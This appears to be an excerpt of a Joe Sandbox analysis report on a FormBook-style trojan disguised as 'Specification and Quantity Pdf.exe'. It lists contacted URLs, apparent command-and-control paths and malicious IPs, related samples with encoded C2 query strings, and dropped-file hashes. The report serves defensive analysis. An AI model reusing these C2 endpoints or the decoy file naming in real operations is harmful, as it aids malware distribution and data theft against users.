https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.maximsboutique.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.ancientshadowguilt.spaceReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodstuff.tv	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000008.00000002.3757784608.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jam-nins.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3767349991.0000000010E79000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3752820809.0000000004B39000.00000004.10000000.00040000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taxuw.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jam-nins.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.pollensense.com/	explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.thehandycrewcompany.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.volkovastyu.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000008.00000002.3757019252.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3757051440.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3756253250.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tripskorea.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.playdoapp.online	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.395boulderbrookdr.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thehandycrewcompany.com/n7ak/www.tripskorea.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tripskorea.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.parkpeninsula.online/n7ak/www.395boulderbrookdr.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taxuw.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ancientshadowguilt.space/n7ak/www.maximsboutique.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1690.bizReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.parkpeninsula.online/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuktukwines.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tripskorea.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gameofgem.comReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.supremeajock.bizReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taxuw.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.dr	false	URL Reputation: safe	unknown
http://www.sdnaqianchuan.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodstuff.tv/n7ak/www.thehandycrewcompany.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crash-reports.mozilla.com/submit?id=	rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodstuff.tvReferer:	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.com	explorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdnaqianchuan.com/n7ak/	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gameofgem.com	explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
203.161.60.191	www.jam-nins.com	Malaysia		45899	VNPT-AS-VNVNPTCorpVN	true
23.227.38.74	shops.myshopify.com	Canada		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515401
Start date and time:	2024-09-22 17:24:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Specification and Quantity Pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/11@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 71% Number of executed functions: 64 Number of non-executed functions: 224
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:25:09	API Interceptor	21x Sleep call for process: powershell.exe modified
11:25:18	API Interceptor	5241125x Sleep call for process: explorer.exe modified
12:31:25	API Interceptor	9010529x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.161.60.191	0001.exe	Get hash	malicious	FormBook	Browse	www.gsolartech.com/kmge/
203.161.60.191	Sales Contract Document.bat.exe	Get hash	malicious	FormBook	Browse	www.notbokin.online/45er/?Eb=wE2C7xhMoBPbyVVxV0BL8UTP1qQsXiLsH8oX9T1ewB5bIsG+GE5//bwpxqIUxj7HmU5h&ohrPK2=Txo0d8
23.227.38.74	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?EhCdVX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YsxR0Bd308&Ir=X2JLBxZp
	0nazQxrt5MZ5BRK.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?RlXX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP480K2QI5QWVnx/JXOA==&DvU8k=hbjlAVS0fTh
	ojtBIU0jhM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.faredeal.online/v15n/?qN9=EFNxULM0Cf1t&jL0=ukmuyFp122ER9SkUd0Oy5jDnVATzXW6kTvhnBjXlJsYO+LS6EgGMB9Jvm3Bl806Q2DBF
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?5jE=K85VkNWCgTAjHltp4ubjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YJqgEBd3ox&ZN9Ls=9rCTo2P0wPzDj0p
	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	www.vanguardcoffee.shop/rn94/?D8v=8pGtVJo0up&Rfg=24QTUhZRstyZshAJnYZI2UxfXBs/uV+QALIDsDsnR/VZc8/4uu3qctyboRQgkU7gUCap
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2
	MAPAL AMENDED PI SO23000680.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	Payment Advice - Ref[GLV407423235].scr.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	New Inquiry GLES Inquiry G-6463_pdf.scr.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	http://329e60-b9.myshopify.com/_t/c/A1020004-17EE30B00427829D-68C1B5C3/	Get hash	malicious	Unknown	Browse	329e60-b9.myshopify.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.jam-nins.com	PI_and_payment_confirmed_pdf.exe	Get hash	malicious	FormBook, DBatLoader	Browse	203.161.55.145
	Nova_lista_narudzbi.exe	Get hash	malicious	FormBook, DBatLoader	Browse	5.183.8.25
	Copie a bonului de plata.exe	Get hash	malicious	FormBook, DBatLoader	Browse	5.183.8.25
	Racun je u prilogu.exe	Get hash	malicious	DBatLoader FormBook	Browse	162.0.216.198
shops.myshopify.com	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	t5ueYgHiHnIdeNe.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://chiao1129.github.io/login	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	http://vineethkinik.github.io/Netflix-wesite-frontend	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	0nazQxrt5MZ5BRK.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	ojtBIU0jhM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	DPPLYAD_12872 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VNPT-AS-VNVNPTCorpVN	FYI.PDF.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
	DHL Arrive Notice doc pdf.exe	Get hash	malicious	FormBook	Browse	203.161.55.124
	GyFcTadTZv.elf	Get hash	malicious	Mirai	Browse	14.245.235.176
	iZP1hJhnmz.elf	Get hash	malicious	Mirai	Browse	14.166.103.230
	dAlxfXyNm7.elf	Get hash	malicious	Mirai	Browse	14.249.33.83
	9B10a4bkpu.elf	Get hash	malicious	Mirai	Browse	14.231.22.130
	BJgQPShJE7.elf	Get hash	malicious	Mirai, Moobot	Browse	113.170.251.18
	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	14.226.229.8
	XPK8NKw7Jv.elf	Get hash	malicious	Mirai, Moobot	Browse	14.229.190.177
	O9M84hUenb.elf	Get hash	malicious	Mirai, Okiru	Browse	14.250.121.226
CLOUDFLARENETUS	ADNOC REQUESTS & reviews.exe	Get hash	malicious	FormBook	Browse	104.21.64.108
	SecuriteInfo.com.BScope.TrojanPSW.Stealer.11760.26822.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.96.3
	SecuriteInfo.com.W64.Agent.IKW.gen.Eldorado.19678.19551.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.4.91
	Docswift004994.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.96.3
	P0 n.#U00b0 1037596.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	urgent inquiry.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DofusInvoker.swf	Get hash	malicious	Unknown	Browse	172.64.41.3
	pic2.jpg.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.191.81

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	modified
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
